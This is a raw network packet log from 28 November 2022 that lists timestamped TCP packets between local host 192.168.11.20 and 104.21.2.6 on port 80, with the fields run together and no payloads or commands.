                                                                    Nov 28, 2022 16:37:04.232167006 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.232167006 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.250154972 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250281096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250293970 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250304937 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250317097 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250329018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250343084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250354052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250365973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250376940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250387907 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250399113 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250411034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250422001 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250433922 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250444889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250456095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250468016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250478983 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250488043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.250488043 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.250500917 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250513077 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250524044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250535011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250546932 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250557899 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250567913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250579119 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250591040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250602007 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250613928 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250624895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250636101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250648022 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250660896 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.250669003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250680923 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250691891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250704050 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250715971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250726938 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250737906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250750065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250761032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250771999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250783920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250794888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250806093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250814915 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.250828028 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.250828028 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.251043081 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.271322966 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271415949 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271430016 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271454096 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271465063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271476030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271486998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271497965 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271502018 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.271517038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271528006 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271538973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271550894 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271555901 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.271569967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271580935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271591902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271644115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271656990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271691084 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271704912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271717072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271722078 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.271734953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271745920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271756887 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271768093 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271778107 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271787882 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271797895 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271809101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271820068 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271867037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271893024 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.271915913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271928072 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271939993 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271950960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271962881 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271975040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271986008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.271997929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272010088 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272022009 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272032976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272044897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272057056 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272059917 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272073030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272084951 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272097111 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272109032 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272120953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272133112 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272145033 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272156954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272166967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272178888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272191048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272202015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272213936 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272226095 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272233963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272233963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272279978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272299051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272340059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272351027 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272377014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272387028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272399902 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272412062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272422075 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272433043 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272444963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272455931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272466898 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272476912 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272490025 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272507906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272527933 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272547960 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272561073 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272572041 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272583008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272593021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272604942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272609949 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272609949 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272623062 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272660017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272685051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272696018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272706985 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272717953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272728920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272738934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272749901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272761106 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272768974 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.272782087 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272960901 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.272960901 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282021999 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282107115 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282121897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282135010 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282146931 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282159090 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282170057 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282180071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282191038 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282202005 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282213926 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282233953 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282244921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282255888 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282267094 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282279015 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282289982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282299995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282332897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282344103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282380104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282386065 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282386065 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282399893 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282412052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282423019 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282433987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282444954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282454014 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282464981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282475948 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282486916 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282497883 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282509089 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282519102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282531023 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282541990 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282555103 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282581091 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282593012 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282640934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282651901 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282664061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282675028 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282685995 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282696962 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282706976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282717943 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282723904 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282735109 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282747030 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282757044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282768011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282778978 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282789946 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282800913 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282810926 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282844067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282855034 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.282895088 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282895088 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.282948017 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283001900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283014059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283025026 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283035994 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283046961 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283056021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.283058882 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.283229113 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.283391953 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.286282063 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286379099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286427021 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286438942 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286452055 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286463976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286475897 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286487103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286498070 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286509037 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286519051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.286617041 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.286617041 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.286814928 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292064905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292155981 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292208910 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292231083 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292248964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292273998 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292294979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292321920 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292340040 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292360067 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292373896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292385101 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292396069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292413950 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292443037 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292443037 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292443991 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292459011 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292489052 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292500973 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292511940 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292524099 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292562008 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292573929 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292584896 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292608976 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292608976 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292634964 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292646885 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292659044 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292669058 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292692900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292721987 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292732954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292743921 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292754889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292773962 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292783976 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292809963 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292824984 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292836905 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292848110 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292865992 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292879105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292891979 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292903900 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292916059 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292928934 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292938948 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.292952061 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.292965889 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.293108940 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.293267965 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.305561066 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305639982 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305655003 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305681944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305701971 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305706978 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.305736065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305757046 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305768967 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305782080 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305794954 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305807114 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305819035 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305830956 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305844069 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305869102 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305877924 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.305888891 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305901051 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305912018 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305923939 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305934906 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305947065 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.305979013 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306046963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.306046963 CET4983080192.168.11.20104.21.2.6
                                                                    Nov 28, 2022 16:37:04.306067944 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306080103 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306092024 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306103945 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306116104 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306127071 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306152105 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306168079 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306201935 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306215048 CET8049830104.21.2.6192.168.11.20
                                                                    Nov 28, 2022 16:37:04.306217909 CET4983080192.168.11.20104.21.2.6
